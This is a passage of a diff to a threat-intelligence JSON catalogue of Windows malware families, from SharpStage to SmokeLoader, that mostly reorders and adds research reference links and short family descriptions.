the main activity class called “Stage_One”. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ", + "description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called \u201cStage_One\u201d. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage", @@ -43778,11 +45827,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", - "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/", - "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan", + "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/", "https://intel471.com/blog/a-brief-history-of-ta505", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" ], @@ -43797,8 +45846,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", - "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-walker" + "https://www.secureworks.com/research/threat-profiles/bronze-walker", + "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" ], "synonyms": [], "type": [] @@ -43811,8 +45860,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape", - "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf" ], "synonyms": [], "type": [] @@ -43852,14 +45901,15 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", + "https://www.zscaler.com/blogs/security-research/new-wave-win32caphaw-attacks-threatlabz-analysis", + "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", + "https://www.welivesecurity.com/2013/02/25/caphaw-attacking-major-european-banks-with-webinject-plugin/", "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw", "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", - "https://www.zscaler.com/blogs/security-research/new-wave-win32caphaw-attacks-threatlabz-analysis", "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", - "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware", "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/", - "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html" + "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" ], "synonyms": [ "Caphaw" @@ -43874,7 +45924,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidetwist", - "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" + "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/", + "https://nsfocusglobal.com/apt34-unleashes-new-wave-of-phishing-attack-with-variant-of-sidetwist-trojan/" ], "synonyms": [], "type": [] @@ -43887,9 +45938,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware", "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", - "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware" + "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf" ], "synonyms": [ "ScrambleCross" @@ -43904,15 +45955,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", - "https://www.secrss.com/articles/26507", - "https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/", - "https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c", "https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/", - "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html", - "https://s.tencent.com/research/report/659.html", + "https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c", "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", + "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html", + "https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", + "https://s.tencent.com/research/report/479.html", + "https://s.tencent.com/research/report/659.html", "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", - "https://s.tencent.com/research/report/479.html" + "https://www.secrss.com/articles/26507" ], "synonyms": [], "type": [] @@ -43926,8 +45978,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_blue", "https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware", - "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/", - "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF" + "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF", + "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/" ], "synonyms": [ "H0lyGh0st", @@ -43944,8 +45996,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_purple", "https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware", - "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/", - "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF" + "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF", + "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/" ], "synonyms": [ "H0lyGh0st", @@ -43961,15 +46013,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware", "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4", - "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks", - "https://www.us-cert.gov/ncas/alerts/TA14-353A", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.secureworks.com/research/threat-profiles/nickel-academy", - "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware" + "https://www.us-cert.gov/ncas/alerts/TA14-353A", + "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", + "https://www.anomali.com/blog/evidence-of-stronger-ties-between-north-korea-and-swift-banking-attacks", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" ], "synonyms": [ "Destover" @@ -43984,9 +46038,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siesta_graph", - "https://www.elastic.co/de/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph", + "https://x.com/threatintel/status/1701259256199090217", + "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns", "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry", - "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns" + "https://www.elastic.co/de/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph" ], "synonyms": [], "type": [] @@ -44037,26 +46092,31 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", - "https://securelist.com/the-silence/83009/", - "https://github.com/Tera0017/TAFOF-Unpacker", - "https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/", - "https://securityintelligence.com/posts/x-force-prevents-zero-day-from-going-anywhere", - "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf", "https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html", - "https://malware.love/malware_analysis/reverse_engineering/2023/02/12/analyzing-truebot-packer.html", - "http://www.intezer.com/silenceofthemoles/", - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits", - "https://malware.love/malware_analysis/reverse_engineering/2023/02/18/analyzing-truebot-static-unpacking.html", - "https://norfolkinfosec.com/some-notes-on-the-silence-proxy/", + "https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/", + "https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf", + "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/", "https://www.youtube.com/watch?v=FttiysUZmDw", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://norfolkinfosec.com/some-notes-on-the-silence-proxy/", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", "https://www.group-ib.com/resources/threat-research/silence.html", + "https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html", + "https://securityintelligence.com/posts/x-force-prevents-zero-day-from-going-anywhere", + "https://securelist.com/the-silence/83009/", + "https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits", + "https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/", + "https://github.com/Tera0017/TAFOF-Unpacker", + "http://www.intezer.com/silenceofthemoles/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", + "https://malware.love/malware_analysis/reverse_engineering/2023/02/12/analyzing-truebot-packer.html", + "https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/", + "https://malware.love/malware_analysis/reverse_engineering/2023/02/18/analyzing-truebot-static-unpacking.html", "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [ "TrueBot" @@ -44084,8 +46144,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", - "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm", - "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html" + "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html", + "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm" ], "synonyms": [], "type": [] @@ -44110,10 +46170,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.youtube.com/watch?v=u2HEGDzd8KM", "https://blog.trendmicro.com/trendlabs-security-intelligence/simda-a-botnet-takedown/", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://www.youtube.com/watch?v=u2HEGDzd8KM", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://secrary.com/ReversingMalware/iBank/" ], "synonyms": [ @@ -44142,15 +46202,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", "https://en.wikipedia.org/wiki/Torpig", - "https://www.recordedfuture.com/turla-apt-infrastructure/", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan", - "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", - "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.recordedfuture.com/turla-apt-infrastructure/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/" ], "synonyms": [ "Anserin", @@ -44169,8 +46229,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/" ], "synonyms": [], @@ -44184,9 +46244,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skimer", - "http://atm.cybercrime-tracker.net/index.php", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html", "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", - "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" + "http://atm.cybercrime-tracker.net/index.php" ], "synonyms": [], "type": [] @@ -44226,15 +46286,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-hunter", - "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/", "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf", - "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender-Whitepaper-PAC-A4-en_EN1.pdf", - "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/" + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", + "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/", + "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender-Whitepaper-PAC-A4-en_EN1.pdf" ], "synonyms": [ "Kotel" @@ -44301,10 +46361,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", - "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", "https://securelist.com/apt-slingshot/84312/", - "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/", - "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf" + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", + "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", + "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" ], "synonyms": [], "type": [] @@ -44317,19 +46377,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver", - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks", - "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://asec.ahnlab.com/en/47088/", - "https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf", - "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/", - "https://github.com/BishopFox/sliver", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", "https://www.telsy.com/download/5900/?uid=b797afdcfb", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks", + "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", + "https://www.immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/", + "https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf", + "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/", + "https://github.com/BishopFox/sliver", "https://github.com/chronicle/GCTI", + "https://asec.ahnlab.com/en/47088/", + "https://embee-research.ghost.io/shodan-censys-queries/", "https://team-cymru.com/blog/2022/04/29/sliver-case-study-assessing-common-offensive-security-tools/", + "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", "https://www.team-cymru.com/post/sliver-case-study-assessing-common-offensive-security-tools", - "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/" + "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx", + "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/", + "https://asec.ahnlab.com/en/55652/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [], "type": [] @@ -44351,12 +46416,12 @@ "value": "slnrat" }, { - "description": "", + "description": "According to MITRE, SLOTHFULMEDIA is a remote access Trojan written in C++ that has been used by an unidentified \"sophisticated cyber actor\" since at least January 2017. It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia", - "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a" + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a", + "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" ], "synonyms": [ "QueenOfClubs" @@ -44371,11 +46436,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub", - "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/", "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf", - "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html" + "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html", + "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf" ], "synonyms": [], "type": [] @@ -44388,8 +46453,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", - "https://www.secureworks.com/research/threat-profiles/bronze-express", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-express" ], "synonyms": [ "speccom" @@ -44417,18 +46482,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager", - "https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4", - "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/", "https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", - "https://blog.group-ib.com/task", - "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html", - "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1", "https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html", - "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", + "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1", + "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html", "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/", - "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", "https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" + "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", + "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/", + "https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4", + "https://blog.group-ib.com/task" ], "synonyms": [ "PhantomNet" @@ -44452,13 +46517,13 @@ "value": "SmartEyes" }, { - "description": "Ransomware.", + "description": "According to PCrisk, Smaug ransomware is available for download on the dark web: it is for sale as Ransomware as a Service (RaaS). Therefore, cyber criminals who purchase it can perform ransomware attacks without having to develop malware of this type. Smaug is designed to encrypt files, rename them and create a ransom message.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug", - "https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html" + "https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/" ], "synonyms": [], "type": [] @@ -44471,9 +46536,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokedham", + "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html", "https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise", - "https://www.mandiant.com/resources/burrowing-your-way-into-vpns", - "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html" + "https://www.mandiant.com/resources/burrowing-your-way-into-vpns" ], "synonyms": [], "type": [] @@ -44486,77 +46551,83 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", - "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", - "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service", - "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886", - "https://x0r19x91.in/malware-analysis/smokeloader/", - "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer", - "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", - "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", - "https://research.checkpoint.com/2019-resurgence-of-smokeloader/", - "http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html", - "https://hatching.io/blog/tt-2020-08-27/", - "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", - "https://youtu.be/QOypldw6hnY?t=3237", - "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://intel471.com/blog/privateloader-malware", - 